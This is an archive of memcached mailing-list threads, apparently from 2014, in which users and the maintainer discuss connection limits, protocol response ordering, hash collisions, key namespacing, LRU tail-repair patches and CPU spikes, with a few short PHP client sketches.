 hash_power_level = 17, 
   hash_bytes = 524288, hash_is_expanding = false, expired_unfetched = 0, 
 evicted_unfetched = 0, 
   slab_reassign_running = false, slabs_moved = 20, lru_crawler_running = 
 false, 
   disable_write_by_exptime = 0, disable_write_by_length = 0, 
 disable_write_by_access = 0, 
   evicted_write_reply_timeout_times = 0}

   (gdb) p allow_new_conns
   $4 = false

   And I found that allow_new_conns is just set to false when accept fails 
 and errno is EMFILE. 
   Here is the code:  
 static void drive_machine(conn *c) {
                  ……
                  } else if (errno == EMFILE) {
                    if (settings.verbose > 0)
                          fprintf(stderr, "Too many open connections\n");
                    accept_new_conns(false);
                    stop = true;
                  } else {
                  ……
 }
   
   If I change the flag allow_new_conns, it can work again. As below:
   (gdb) set allow_new_conns=1
   (gdb) p allow_new_conns
   $5 = true
   (gdb) c
   Continuing.

   I know that allow_new_conns will be set to true when conn_close is 
 called. But how could this happen in the case where accept failed
 with errno EMFILE and this connection was the only one accepting? 
 Note that curr_conns = 5.
   We have not run out of fds:
   ls /proc/1748(memcached_pid)/fd | wc -l
   17
   






Re: Is memcached server response guaranteed to be in order?

2014-10-23 Thread dormando
with the ascii protocol, yes. It would not work otherwise.

with the binary protocol, the answer is also currently yes, but the
ordering isn't strict and could be up to the individual commands.
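
As an illustration (a raw-socket sketch, not from this thread; the host,
port, and keys are placeholders), pipelined ascii commands come back in
exactly the order they were written:

    <?php
    // Minimal sketch: two ascii commands pipelined on one connection.
    // Replies arrive strictly in the order the commands were sent.
    $s = stream_socket_client('tcp://127.0.0.1:11211', $errno, $errstr, 2);

    fwrite($s, "set a 0 0 1\r\n1\r\nset b 0 0 1\r\n2\r\n"); // two sets, back to back
    echo fgets($s);   // "STORED" -- reply to the set of 'a'
    echo fgets($s);   // "STORED" -- reply to the set of 'b'

    fwrite($s, "get a\r\nget b\r\n");                       // two gets, back to back
    for ($i = 0; $i < 6; $i++) {
        echo fgets($s);   // VALUE a / 1 / END, then VALUE b / 2 / END, in order
    }
    fclose($s);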

On Wed, 22 Oct 2014, Yaowen Tu wrote:


 If I have a client that creates a TCP connection, and sends multiple commands 
 to the memcached server, is the server guaranteed to respond to these
 commands in the same order?


 Thanks,

 Yaowen







Re: Is memcached server response guaranteed to be in order?

2014-10-23 Thread dormando
I don't believe any binprot commands are out of order presently. However
the protocol *allows* them to be out of order. it's probably a bug you're
seeing in the client. also make sure your memcached daemon is up to date.

On Thu, 23 Oct 2014, Yaowen Tu wrote:

 Thanks for your response.
 Could you please give me more information about individual commands? In which 
 cases would it be out of order?

 I am using the xmemcached client and seeing some weird behavior with binary 
 commands, while text commands work. 

 I know there are some bugs in the xmemcached client's binary command code; I am 
 trying to dig deeper to see if it is because of the ordering of memcached
 responses. 

 Based on your answer it is highly possible, so I would really appreciate it 
 if you could share more detailed information with me.

 Thanks,
 Yaowen

 Yaowen

 On Thu, Oct 23, 2014 at 5:19 PM, dormando dorma...@rydia.net wrote:
   with the ascii protocol, yes. It would not work otherwise.

   with the binary protocol, the answer is also currently yes, but the
   ordering isn't strict and could be up to the individual commands.

   On Wed, 22 Oct 2014, Yaowen Tu wrote:

   
If I have a client that creates a TCP connection, and sends multiple 
 commands to the memcached server, is the server guaranteed to
   respond to these
commands in the same order?
   
   
Thanks,
   
Yaowen
   
   







Re: Max number of concurrent updates for a same key at same time in memcache.

2014-10-21 Thread dormando
Internally, there's a per-item lock, so an item can only be updated by one
thread at a time.

This is *just* during the internal update, not while a client is uploading
or downloading data to the key. You can probably do several thousand
updates per second to the same key without problem (like incr'ing in a
loop). Possibly a lot more (100k+)
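
(A minimal sketch of that incr-in-a-loop case, assuming the pecl Memcache
client and a made-up key name:)

    <?php
    // Minimal sketch: hammering one key with atomic increments.
    // add() seeds the counter and is a no-op if the key exists;
    // increment() is a single locked update server-side, so
    // concurrent clients never lose counts.
    $mc = new Memcache();
    $mc->connect('127.0.0.1', 11211);

    $mc->add('hit_counter', 0);
    for ($i = 0; $i < 10000; $i++) {
        $mc->increment('hit_counter', 1);
    }
    echo $mc->get('hit_counter'), "\n";   // 10000 from a single client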

What're you trying to do which requires updating one key so much?

On Tue, 21 Oct 2014, Shashank Sharma wrote:

 Hi all,

 Reading the memcached documents, it's clear that it can handle a very heavy load of 
 traffic. However, I was more interested in knowing the bound on how many
 updates to a specific key memcached can handle at the same time.

 -Shashank






Re: Collision Resolution mechanism

2014-10-19 Thread dormando
The hash table buckets are chained.

By default memcached autoresizes the hash table as the number of items
grows, so bucket collision is relatively rare. In recent versions you can
also switch the internal hash algorithm between jenkins and murmur if you
want to test.
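
(To illustrate what chaining means here, a toy PHP sketch, not memcached's
actual C code: colliding keys share a bucket's list, and a lookup hashes to
the bucket and then walks that list comparing full keys:)

    <?php
    // Toy sketch of chained buckets -- not memcached's implementation.
    $n = 16;
    $buckets = array_fill(0, $n, []);

    function bucket_index($key, $n) { return abs(crc32($key)) % $n; }

    function chain_set(&$buckets, $key, $value) {
        $i = bucket_index($key, count($buckets));
        $buckets[$i][] = [$key, $value];      // chain grows on collision
    }

    function chain_get($buckets, $key) {
        $i = bucket_index($key, count($buckets));
        foreach ($buckets[$i] as $entry) {    // walk the chain
            if ($entry[0] === $key) return $entry[1];
        }
        return null;
    }

    chain_set($buckets, 'foo', 1);
    chain_set($buckets, 'bar', 2);
    echo chain_get($buckets, 'bar');          // 2, even if the buckets collide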

On Sun, 19 Oct 2014, Deepak S wrote:

 Hi all, this is my first mail to this awesome group. What is the collision 
 resolution mechanism used in the memcached hash table?
 Thanks






memcached 1.4.21

2014-10-13 Thread dormando
Is out: https://code.google.com/p/memcached/wiki/ReleaseNotes1421 -
targeted release just for the OOM issues reported by Box + some misc
fixes.



Re: items not able to be memcached and not logging

2014-10-05 Thread dormando
No idea, sorry :/

On Thu, 2 Oct 2014, Sheel Shah wrote:

 Understood.
 Do you know where I can find a supported windows version of the memcached 
 exe? The most recent one I was able to find was version 1.4.4.

 Thanks,
 Sheel






Re: items not able to be memcached and not logging

2014-10-01 Thread dormando
Hey,

Sorry but that version is well over 5 years old, and a forked windows port
at that. It's unsupported.

On Wed, 1 Oct 2014, Sheel Shah wrote:


 I believe the version number on our current memcached EXE is 1.2.6.

 The error I see in my independent log is the following:

 Item could not be cached with memcached: <item name> Type: 
 System.Data.DataTable, In process Cache Duration: 02:00:00

 I intentionally left the item name out of the reply, but the items are not 
 all the same, and are of different types.

 Thanks,
 Sheel






Re: items not able to be memcached and not logging

2014-09-30 Thread dormando
What version of memcached are you running (the server, not the client).

What is the exact error you're seeing in the logs?

On Tue, 30 Sep 2014, Sheel Shah wrote:

 Hello,
 I apologize for the vagueness of this post, as I am new to using and 
 supporting memcached. For the last couple of months, we have seen a large
 number of errors where items could not be cached through Memcached. To 
 troubleshoot the issue, we are attempting to enable logging that we found on
 this URL 

 https://github.com/enyim/EnyimMemcached/wiki/Configure-Logging

 We attempted to enable the diagnostic logging as well as the Log4Net logging. 
 And while we are seeing errors in another log file which shows that
 the items could not be memcached, we are unable to see anything in the 
 diagnostic logs that could explain why the items are failing. I'm fairly
 certain it's not a permissions problem, as I allowed the app pool identity 
 full access to the subfolder as well as the log file, and the read-only
 attribute on the file/folder is not checked.

 Has anyone else had a similar issue or can point me in the right direction?

 Thanks,
 Sheel Shah






Re: change os'date Memcached stats time While being changed

2014-09-16 Thread dormando
Recent versions use a monotonic clock, so changing the system clock can't
cause memcached to lose its mind.
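
(A client-side illustration of the same idea, not from this thread: PHP's
hrtime(), available since PHP 7.3, is a monotonic source, so elapsed-time
math survives a date change while time() does not:)

    <?php
    // Minimal sketch: wall clock vs monotonic clock. Changing the system
    // date during the sleep shifts the time() delta, but the hrtime()
    // delta stays around 2s -- the property recent memcached relies on.
    $wall = time();          // wall clock, affected by `date -s ...`
    $mono = hrtime(true);    // monotonic nanoseconds, only moves forward

    sleep(2);                // change the system date here to see the effect

    printf("wall elapsed: %d s\n", time() - $wall);
    printf("mono elapsed: %.3f s\n", (hrtime(true) - $mono) / 1e9);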

Why are you trying to do this on purpose?

On Tue, 16 Sep 2014, Yu Liu wrote:

 Today I found memcached could not work. I found that the memcached stats time 
 changed when the OS date was changed.
 EXP-1 :
 Centos 6.5 64bit 
 Memcache Version: 1.4.7 

 # date
 Tue Sep 16 09:56:43 CST 2014

 # telnet 10.11.1.15 11211
 Trying 10.11.1.15...
 Connected to 10.11.1.15 (10.11.1.15).
 Escape character is '^]'.
 stats
 STAT pid 2923
 STAT uptime 9
 STAT time 1410850931
 STAT version 1.4.7

 change date 
 # date
 Fri Jul 26 00:00:00 CST 2013

 # telnet 10.11.1.15 11211
 Trying 10.11.1.15...
 Connected to 10.11.1.15 (10.11.1.15).
 Escape character is '^]'.
 stats
 STAT pid 2923
 STAT uptime 4258884380
 STAT time 5669735302
 STAT version 1.4.7

 However, after upgrading memcached to 1.4.20: 
 Centos 6.5 64bit 
 Memcache Version: 1.4.20

 #stats
 STAT pid 2586
 STAT uptime 8
 STAT time 1410838280
 STAT version 1.4.20
 STAT libevent 1.4.13-stable

 change date 
 stats
 STAT pid 2586
 STAT uptime 55
 STAT time 1410838327
 STAT version 1.4.20

 Now the time cannot be changed. What's the matter? 

 I did not find the answer in 
 http://code.google.com/p/memcached/wiki/ReleaseNotes.






Re: Remove certain items from the cache

2014-09-03 Thread dormando
Why would another client get the wrong data if the original data was
successfully uploaded?

I don't understand the use case, and it's not possible either way.

On Wed, 3 Sep 2014, Xingui Shi wrote:

 What I meant is that the data is successfully uploaded, but the client restarts for 
 some reason. The data stored in the memcached server needs to be flushed,
 or another client may get the wrong data.

 On Wednesday, September 3, 2014 at 3:04:59 PM UTC+8, Dormando wrote:
   If a client is uploading something and it does not complete the upload,
   the data will be dropped.

   Otherwise, no.

   On Wed, 3 Sep 2014, Xingui Shi wrote:

Hi, is there any way to drop data added by a client when the client 
 aborts or exits normally?
   
thanks.
   
 On Tuesday, August 12, 2014 at 10:25:43 AM UTC+8, Dormando wrote:
   
       Hello there,
       Is there a method to remove items from the cache using a regular
       expression on the key? For example, we want to remove all keys
       like my_key_*.
       We tried to parse all the slabs with the "stats cachedump" command,
       but our slabs contain several pages and it is impossible to recover
       all the elements!
       Thank you.
      
   
      Hi,
   
      The common way to do this, instantly, and atomically across 
 your entire
      memcached cluster is via namespacing:
      
 http://code.google.com/p/memcached/wiki/NewProgrammingTricks#Namespacing
   
      You take a tradeoff: before I look up my key, I fetch a side 
 key which
      contains the current prefix. Then I add that prefix to my 
 normal key and
      do the lookup. When you want to invalidate all keys with the 
 same prefix,
      you incr or otherwise update the prefix. The old keys will fall 
 out of the
      LRU and your clients will no longer access them.
   
      This is *much* more efficient than any wrangling around with 
 scanning and
      parsing keys. That only gets worse as you get a larger cluster, 
 while
      namespacing stays at a consistent speed.
   
      Does this match what you're looking for, or did you have some 
 specific
      requirements? If so, please give more detail for your problem.
   
   
   






Re: tail repair issue (1.4.20)

2014-08-28 Thread dormando
Thanks so much for sticking around and testing!

I have a number of bugs to go over as I mentioned before, so it may take a
little longer to bake this into a release. I still want to add a cap on
how much churn it allows, so for 10,000 items you might instead get a
handful of OOM's. This is to deal with extreme cases regardless.

Again, thanks. It's been really hard to get people to stick around for
this; first we had to fix the crash caused by items sitting in the LRU,
then it became apparent why they were there and we could fix that issue.
I'm happy to understand this.

On Tue, 26 Aug 2014, Jay Grizzard wrote:

 Okay, so, we did some testing!
 I deployed a test build last Thursday and let it run with no further changes, 
 graphing the ‘reflocked’ counter (which is the metric I added for
 ‘refcounted so moved to other end of LRU’). The graph for that ends up 
 looking like this: http://i.imgur.com/0CZfHWf.png

 Basically a spike on restart (which makes sense, there’s probably a few 
 fast-expiring or deleted entries on the tail almost immediately), and then
 occasional spikes over time. More spikes than I actually *expected*, but none 
 are particularly large, and I’d completely believe that we had
 ‘legitimate’ locking of items in there, too. So I consider that completely 
 helpful.

 (The graph is total across all slabs, and peaks at 8/sec, and only briefly, 
 so… yeah, healthy.)

 The other thing I did yesterday was to intentionally lock a bunch of items to 
 see what the behavior looked like. I picked a slab that was
 relatively high churn (max item age ~6000) and had no reflocks at all. 
 Created 10k items and locked them. The reflocked graph for that looks like
 this: http://i.imgur.com/oghSU3o.png

 Basically, one big spike every couple of hours (with the interval decreasing 
 as traffic increases). You can’t see it from the graph, but the
 reflocked counter increments by exactly 10,000 for each spike, while the 
 outofmemory counter stays at zero. This is exactly what I expected to
 happen, which is awesome.

 We’ve otherwise been really stable with the patch, so I think I’m fairly 
 comfortable saying the patch you provided is a reasonable solution to the
 problem. I’d even be satisfied without adding anything else to limit number 
 of moves to 5 in a go, since the odds of that being an issue in just
 about any situation seem … low. But if you can add it cleanly, go for it! :)

 Let me know when you have a final patch (which would presumably be a release 
 candidate for 1.4.21) and I’ll be happy to verify that as well, and
 then we can officially declare this bug dead and have a little party, since I 
 totally think finally finding this thing is deserving of a party… ;)

 -j


 On Thu, Aug 21, 2014 at 12:33 PM, dormando dorma...@rydia.net wrote:
   Okay cool.

   As I mentioned with the original link I will be adding some sort of 
 sanity
   checking to break the loop. I just have to reorganize the whole thing 
 and
   ran out of time (I got stuck for a while because unlink was wiping
   search->prev and it kept bailing the loop :P)

   I need someone to try it to see if it's the right approach first, then 
 the
   rest is doable. It's just tricky code and requires some care.

   Thanks for putting some effort into this. I really appreciate it!

   On Thu, 21 Aug 2014, Jay Grizzard wrote:

Hi, sorry about the slow response. Naturally, the daily problem we 
 were having stopped as soon as you checked in that patch.
Typical, eh?
Anyhow, I’ve studied the patch and it seems to be pretty good — the 
 only worry I have is that if you end up with the extremely
degenerate case of an entire LRU being refcounted, you have to walk 
 the entire LRU before returning ‘out of memory’. I’m not
thinking that this is a big problem (because if you have a few tens 
 of thousands of items, that’s pretty quick… and if you have
millions… well, why do you have millions of items refcounted?), but 
 worth at least noting. 
   
I was going to suggest a change to make it fit into the ‘tries’ loop 
 better so those moves got counted as a try, but there
doesn’t seem to be a particularly clean way to do that, so I’m 
 willing to just accept it as a limitation that might get hit in
situations far worse than the one that’s causing us issues right now. 
 I’m okay with that. 
   
I haven’t tried the patch under production load yet, because I wanted 
 to have stats to give us some information about what was
going on under the hood. I finally got a chance to add in an 
 additional stat for refcounted items on the tail — I sent you a PR
with that patch (https://github.com/dormando/memcached/pull/1). I 
 *think* I got the right things in the right places, though you
may take issue with the stat name (“reflocked”).
   
Now that I have the stats, I’m going to work on putting

Re: tail repair issue (1.4.20)

2014-08-21 Thread dormando
Okay cool.

As I mentioned with the original link I will be adding some sort of sanity
checking to break the loop. I just have to reorganize the whole thing and
ran out of time (I got stuck for a while because unlink was wiping
search->prev and it kept bailing the loop :P)

I need someone to try it to see if it's the right approach first, then the
rest is doable. It's just tricky code and requires some care.

Thanks for putting some effort into this. I really appreciate it!

On Thu, 21 Aug 2014, Jay Grizzard wrote:

 Hi, sorry about the slow response. Naturally, the daily problem we were 
 having stopped as soon as you checked in that patch.
 Typical, eh?
 Anyhow, I’ve studied the patch and it seems to be pretty good — the only 
 worry I have is that if you end up with the extremely
 degenerate case of an entire LRU being refcounted, you have to walk the 
 entire LRU before returning ‘out of memory’. I’m not
 thinking that this is a big problem (because if you have a few tens of 
 thousands of items, that’s pretty quick… and if you have
 millions… well, why do you have millions of items refcounted?), but worth at 
 least noting. 

 I was going to suggest a change to make it fit into the ‘tries’ loop better 
 so those moves got counted as a try, but there
 doesn’t seem to be a particularly clean way to do that, so I’m willing to 
 just accept it as a limitation that might get hit in
 situations far worse than the one that’s causing us issues right now. I’m 
 okay with that. 

 I haven’t tried the patch under production load yet, because I wanted to have 
 stats to give us some information about what was
 going on under the hood. I finally got a chance to add in an additional stat 
 for refcounted items on the tail — I sent you a PR
 with that patch (https://github.com/dormando/memcached/pull/1). I *think* I 
 got the right things in the right places, though you
 may take issue with the stat name (“reflocked”).

 Now that I have the stats, I’m going to work on putting a patched copy out 
 under production load to make sure it holds up there,
 and at least see about artificially generating one of the hung-get situations 
 that was causing us problems. I’ll let you know
 how that works out!

 -j


 On Mon, Aug 11, 2014 at 8:54 PM, dormando dorma...@rydia.net wrote:

 Well, sounds like whatever process was asking for that data is dead 
 (and possibly pissing off a customer) so
   you should
indeed figure out what
 that's about.
   
Yeah, we’ll definitely hunt this one down. I’ll have to toss up a 
 monitor to look for things in a write state for
   extended
periods and then go do some tracing (rather than, say, waiting for it 
 to actually break again). We *do* have some
   legitimately
long-running (multi-hour) things going on, so can’t just say “long 
 connection bad!”, but it would be nice if maybe
   those
processes could slurp their entire response upfront or some such.
   
   
 I think another thing we can do is actually throw a 
 refcounted-for-a-long-time 
 item back to the front of the LRU. I'll try a patch for that this 
 weekend. It should
 have no real overhead compared to other approaches of timing out 
 connections.
   
Is there any reason you can’t do “if refcount > 1 when walking the 
 end of the tail, send to the front” without
   requiring
‘refcounted for a long time’ (with, of course, still limiting it to 
 5ish actions)? It seems like this would be
   pretty safe,
since generally stuff at the end of LRU shouldn’t have a refcount, 
 and then you don’t need extra code for figuring
   out how long
something has been refcounted.
   
I guess there’s a slightly degenerate case in there, which is that if 
 you have a small slab that’s 100%
   refcounted, you end up
cycling a bunch of pointers every write just to run the LRU in a big 
 circle and never write anything (similar to
   the case you
suggest in your last paragraph), but that’s a situation I’m totally 
 willing to accept. ;)
   
Anyhow, looking forward to a patch, and will gladly help test!
   

 Here, try out this branch:
 https://github.com/dormando/memcached/tree/refchuck

 It needs some cleanup and sanity checking. I want to redo the loop instead
of the weird goto, add an arg to item_update instead of copypasta, and add
 one or two sanity checks to break the loop if you're trying to alloc out
 of a class that's 100% reflocked.

 I added a test that works okay. Fails before, runs after. Can you try
 this on one or two machines and see what the impact is?

 If it works okay I'll clean it up and merge. Need to spend a little more
 time on the PR queue before I can cut though.


Re: tail repair issue (1.4.20)

2014-08-11 Thread dormando
Apparently I lied about the weekend, sorry...

On Mon, 11 Aug 2014, Jay Grizzard wrote:

  Well, sounds like whatever process was asking for that data is dead (and 
 possibly pissing off a customer) so you should
 indeed figure out what
  that's about.

 Yeah, we’ll definitely hunt this one down. I’ll have to toss up a monitor to 
 look for things in a write state for extended
 periods and then go do some tracing (rather than, say, waiting for it to 
 actually break again). We *do* have some legitimately
 long-running (multi-hour) things going on, so can’t just say “long connection 
 bad!”, but it would be nice if maybe those
 processes could slurp their entire response upfront or some such.

Good luck!


  I think another thing we can do is actually throw a 
  refcounted-for-a-long-time 
  item back to the front of the LRU. I'll try a patch for that this weekend. 
  It should
  have no real overhead compared to other approaches of timing out 
  connections.

 Is there any reason you can’t do “if refcount > 1 when walking the end of the 
 tail, send to the front” without requiring
 ‘refcounted for a long time’ (with, of course, still limiting it to 5ish 
 actions)? It seems like this would be pretty safe,
 since generally stuff at the end of LRU shouldn’t have a refcount, and then 
 you don’t need extra code for figuring out how long
 something has been refcounted.

 I guess there’s a slightly degenerate case in there, which is that if you 
 have a small slab that’s 100% refcounted, you end up
 cycling a bunch of pointers every write just to run the LRU in a big circle 
 and never write anything (similar to the case you
 suggest in your last paragraph), but that’s a situation I’m totally willing 
 to accept. ;)

 Anyhow, looking forward to a patch, and will gladly help test!


Thanks!

I'm going back and forth on it honestly. I think it should only move it if
it's been at least UPDATE_INTERVAL since it last moved it, possibly
UPDATE_INTERVAL * 4.

Given your case of "I have a bajillion objects ref'ed by this one
connection", and the fact that the allocator only walks five up in the
history before giving up, I have two main options:

1) throw the bottom 5 to the top, then give up (and do that for each
allocation forever, which can slow down all writes by holding the central
cache lock for longer). That'll still cause a number of OOM's while it
tries to clear your 9,000 ref'ed objects from the bottom (yeah I know
it's only 3200ish)

2) If refcounted + last_update < now + UPDATE_INTERVAL*N -> flip to top
and don't count that as a try. This will cause memcached to have a very
brief hiccup when it lands on the pile of objects, but won't cause an OOM
and won't flip around forever.

It also avoids a pathological regression if someone hammers a slab class
stuck in this state (and path #1 was chosen).

If you have teeny slab classes you're likely to be screwed either way, so
the extra time interval doesn't hurt you much more than you would anyway.
I assume/hope objects that you've been fetching take more than a couple
minutes to hit the bottom of the slab class. If they do, your evictions
are probably nutters and hit rate crap anyway; you'd need more ram.

So yeah, leaning toward #2? A different definition of "refcounted for a long
time" compared to what tail_repairs defaulted to. Much shorter.



Re: Remove certain items from the cache

2014-08-11 Thread dormando

 Hello there,
 Is there a method to remove items from the cache using a 
 regular expression on the key? For example, we want to remove all keys like 
 my_key_*.
 We tried to parse all the slabs with the "stats cachedump" command, but our 
 slabs contain several pages and it is impossible to recover all the elements!
 Thank you.


Hi,

The common way to do this, instantly, and atomically across your entire
memcached cluster is via namespacing:
http://code.google.com/p/memcached/wiki/NewProgrammingTricks#Namespacing

You take a tradeoff: before I look up my key, I fetch a side key which
contains the current prefix. Then I add that prefix to my normal key and
do the lookup. When you want to invalidate all keys with the same prefix,
you incr or otherwise update the prefix. The old keys will fall out of the
LRU and your clients will no longer access them.

This is *much* more efficient than any wrangling around with scanning and
parsing keys. That only gets worse as you get a larger cluster, while
namespacing stays at a consistent speed.

Does this match what you're looking for, or did you have some specific
requirements? If so, please give more detail for your problem.
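
For example, a minimal sketch of the trick (PHP with the pecl Memcache
client; the version-key naming is illustrative, not from the wiki page):

    <?php
    // Minimal sketch of namespacing. A side key holds the namespace's
    // current version; real keys embed that version, so bumping the
    // version invalidates the whole prefix at once.
    function ns_key($mc, $ns, $key) {
        $v = $mc->get('ns_version_' . $ns);
        if ($v === false) {                   // seed the version key
            $v = 1;
            $mc->set('ns_version_' . $ns, $v);
        }
        return $ns . '_' . $v . '_' . $key;
    }

    $mc = new Memcache();
    $mc->connect('127.0.0.1', 11211);

    // Normal lookup: one extra get for the prefix, then the real key.
    $value = $mc->get(ns_key($mc, 'my_key', 'user_42'));

    // Invalidate everything under the my_key prefix in one step. The old
    // keys are never referenced again and fall out of the LRU on their own.
    $mc->increment('ns_version_my_key');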



Re: tail repair issue (1.4.20)

2014-08-11 Thread dormando

  Well, sounds like whatever process was asking for that data is dead (and 
 possibly pissing off a customer) so you should
 indeed figure out what
  that's about.

 Yeah, we’ll definitely hunt this one down. I’ll have to toss up a monitor to 
 look for things in a write state for extended
 periods and then go do some tracing (rather than, say, waiting for it to 
 actually break again). We *do* have some legitimately
 long-running (multi-hour) things going on, so can’t just say “long connection 
 bad!”, but it would be nice if maybe those
 processes could slurp their entire response upfront or some such.


  I think another thing we can do is actually throw a 
  refcounted-for-a-long-time 
  item back to the front of the LRU. I'll try a patch for that this weekend. 
  It should
  have no real overhead compared to other approaches of timing out 
  connections.

 Is there any reason you can’t do “if refcount > 1 when walking the end of the 
 tail, send to the front” without requiring
 ‘refcounted for a long time’ (with, of course, still limiting it to 5ish 
 actions)? It seems like this would be pretty safe,
 since generally stuff at the end of LRU shouldn’t have a refcount, and then 
 you don’t need extra code for figuring out how long
 something has been refcounted.

 I guess there’s a slightly degenerate case in there, which is that if you 
 have a small slab that’s 100% refcounted, you end up
 cycling a bunch of pointers every write just to run the LRU in a big circle 
 and never write anything (similar to the case you
 suggest in your last paragraph), but that’s a situation I’m totally willing 
 to accept. ;)

 Anyhow, looking forward to a patch, and will gladly help test!


Here, try out this branch:
https://github.com/dormando/memcached/tree/refchuck

It needs some cleanup and sanity checking. I want to redo the loop instead
of the weird goto, add an arg to item_update instead of copypasta, and add
one or two sanity checks to break the loop if you're trying to alloc out
of a class that's 100% reflocked.

I added a test that works okay. Fails before, runs after. Can you try
this on one or two machines and see what the impact is?

If it works okay I'll clean it up and merge. Need to spend a little more
time on the PR queue before I can cut though.



Re: tail repair issue (1.4.20)

2014-08-07 Thread dormando
Thanks! It might take me a while to look into it more closely.

That conn_mwrite is probably bad, however a single connection shouldn't be
able to do it. Before the OOM is given up, memcached walks up the chain
from the bottom of the LRU by 5ish. So all of them have to be locked, or
possibly some thing I'm unaware of.

Great that you have some cores. Can you look at the tail of the LRU for
the slab which was OOM'ing, and print the item struct there? If possible,
walk up 5-10 items back from the tail and print each (anonymized, of
course). It'd be useful to see the refcount and flags on the items.

Have you tried re-enabling tailrepairs on one of your .20 instances? It
could still crash sometimes, but you can set the timeout to a reasonably
low number and see if that helps at all while we figure this out.

On Thu, 7 Aug 2014, Jay Grizzard wrote:

 (I work with Denis, who is out of town this week)
 So we finally got a more proper 1.4.20 deployment going, and we’ve seen this 
 issue quite a lot over the past week. When it
 happened this morning I was able to grab what you requested.

 I’ve included a couple of “stats conn” dumps, with anonymized addresses, 
 taken four minutes apart. It looks like there’s one
 connection that could possibly be hung:

   STAT 2089:state conn_mwrite

 …would that be enough to cause this problem? (I’m assuming the answer is “it 
 depends”) I snagged a core file from the process
 that I should be able to muck through to answer questions if there’s 
 somewhere in there we would find useful information.

 Worth noting that while we’ve been able to reproduce the hang (a single slab 
 starts reporting oom for every write), we haven’t
 reproduced the “but recovers on its own” part because these are production 
 servers and the problem actually causes real issues,
 so we restart them rather than waiting several hours to see if the problem 
 clears up. 

 Also, reading up in the thread, it’s worth noting that lack of TCP keepalives 
 (which we actually have, memcached enables it)
 wouldn’t actually affect the “and automatically recover” aspect of things, 
 because TCP keepalives only happen when a connection
 is completely idle. When there’s pending data (which there would be on a hung 
 write), standard TCP timeouts (which are much
 faster) apply.

 (And yes, we do have lots of idle connections to our caches, but that’s not 
 something we can immediately fix, nor should it
 directly be the cause of these issues.)

 Anyhow… thoughts?

 -j






Re: Memcached instance and thread configuration parameters

2014-08-07 Thread dormando
Please upgrade. If you have problems with the latest version we can look
into it more.

You can also look at command counters for odd commands being given: make
sure nobody's running flushes, or "stats sizes", or "stats cachedump",
since those can cause CPU spikes and hangs.

With 1.4.20 you can use "stats conns" to see what the connections are
doing during the cpu spike.

On Thu, 7 Aug 2014, Claudio Santana wrote:

 Forgot to say I'm running version 1.4.13 & libevent 2.0.16-stable



 On Thu, Aug 7, 2014 at 6:08 PM, Claudio Santana claudio.sant...@gmail.com 
 wrote:
   Sorry for the late response.

 My CPU utilization is normally between 2.5% and 6.5%.

 So it's interesting you ask this. The reason I submitted the first question 
 is that I've experienced some random CPU utilization spikes. From about 6% 
 CPU utilization it suddenly spikes to 100%, and I can see the offending 
 process is one of the Memcached instances. Sadly this CPU spike is 
 accompanied by all requests timing out, causing the whole system to become 
 unusable.

 I collect minute-by-minute stats of all these memcached instances, and 
 according to my stats this issue develops within 2 minutes. I can see from 
 the command counts that there's no increase in the number of commands being 
 issued right before the CPU spike, nor any increase in the number of bytes 
 in/out.

 Does anybody have any ideas of what could be going on?

 I have all Memcached stats collected by minute in Graphite, I can provide 
 other stats that could help explain this issue
 if necessary.


 On Mon, Aug 4, 2014 at 9:36 PM, dormando dorma...@rydia.net wrote:
   You could run one instance with one thread and serve all of that just
   fine. have you actually looked at graphs of the CPU usage of the host?
   memcached should be practically idle with load that low.

   One with -t 6 or -t 8 would do it just fine.

   On Mon, 4 Aug 2014, Claudio Santana wrote:

Dormando, thanks for the quick response. Sorry for the confusion, I don't 
 have exact metrics per second, but per minute it's 1.12 million sets and 
 1.8 million gets, which translates to 18,666 sets per second and 30,000 
 gets per second.
   
These stats are per Memcached instance which I currently run 3 on 
 each server.
   
Claudio.
   
   
On Mon, Aug 4, 2014 at 6:22 PM, dormando dorma...@rydia.net wrote:
      On Mon, 4 Aug 2014, Claudio Santana wrote:
   
       I have this Memcached cluster where 3 instances of Memcached 
 run in a single server. These servers
   have 24 cores,
      each instance
       is configured to have 8 threads each. Each individual 
 instance serves & have about 5000G gets/sets a
   day and about
      3k current
       connections.
   
I don't know what 5000G gets/sets a day translates to in per-second 
 (nor
what the G-unit even is?), can you define this?
   
 What would be better? consolidate these 3 instances to a single 
 instance per server with 24 threads? I've
   read in a few
articles
 that Memcached's performance starts suffering with more than 4-6 
 threads per instance, is this generally
   true?

 How about keeping the 3 instances per server and decreasing the 
 number of threads to say 4 or 6? or
   creating 4 instances
in the
 same servers instead of 3 and decreasing the number of threads per 
 instance to 6 so there is one thread
   per core.

 Is there a guide you could recommend to configure the right number 
 of threads and strategies to get the
   most out of a
Memcached
 server/instance?

 Thanks,
 Claudio



   

Re: Memcached instance and thread configuration parameters

2014-08-07 Thread dormando
Those three stats commands aren't problematic. The others I listed are.
Sadly there aren't stats counters for them, I think... Are you sure it's
not completely crashing after the CPU spike? It actually recovers on its
own?

On Thu, 7 Aug 2014, Claudio Santana wrote:


 Every minute I run stats, stats items and stats slabs.

 The only commands executed are remove, incr, add, get, set and cas.

 I'm running now with 6 threads per instance, 3 instances per server, and 
 haven't had the issue again, though I'm not claiming this change fixed it.

 I'll definitely update.

 On Aug 7, 2014 6:13 PM, dormando dorma...@rydia.net wrote:
   Please upgrade. If you have problems with the latest version we can look
   into it more.

   You can also look at command counters for odd commands being given: make
   sure nobody's running flushes, or stats sizes, or stats cachedump
   since those can cause CPU spikes and hangs.

   With 1.4.20 you can use stats conns to see what the connections are
   doing during the cpu spike.

   On Thu, 7 Aug 2014, Claudio Santana wrote:

 Forgot to say I'm running version 1.4.13 & libevent 2.0.16-stable
   
   
   
On Thu, Aug 7, 2014 at 6:08 PM, Claudio Santana 
 claudio.sant...@gmail.com wrote:
      Sorry for the late response.
   
My CPU utilization normally is min 2.5% to 6.5% max.
   
So it's interesting you ask this. The reason why I submitted the 1st 
 question is because I've experienced some
   random CPU
utilization spikes. From this about 6% CPU utilization all of the 
 sudden it spikes to 100% and I can see the
   offending
process is one of the Memcached instances. Sadly this CPU spike is 
 accompanied by all requests timing out causing
   the
whole system to become unusable.
   
I collect minute by minute stats of all these memcached instances and 
 according to my stats this issue happens
   within 2
minutes. I can see in the number of commands there's no increase in 
 number of commands being issued right before
   the CPU
spike nor increase in the number of bytes in/out.
   
Does anybody have any ideas of what could be going on?
   
I have all Memcached stats collected by minute in Graphite, I can 
 provide other stats that could help explain this
   issue
if necessary.
   
   
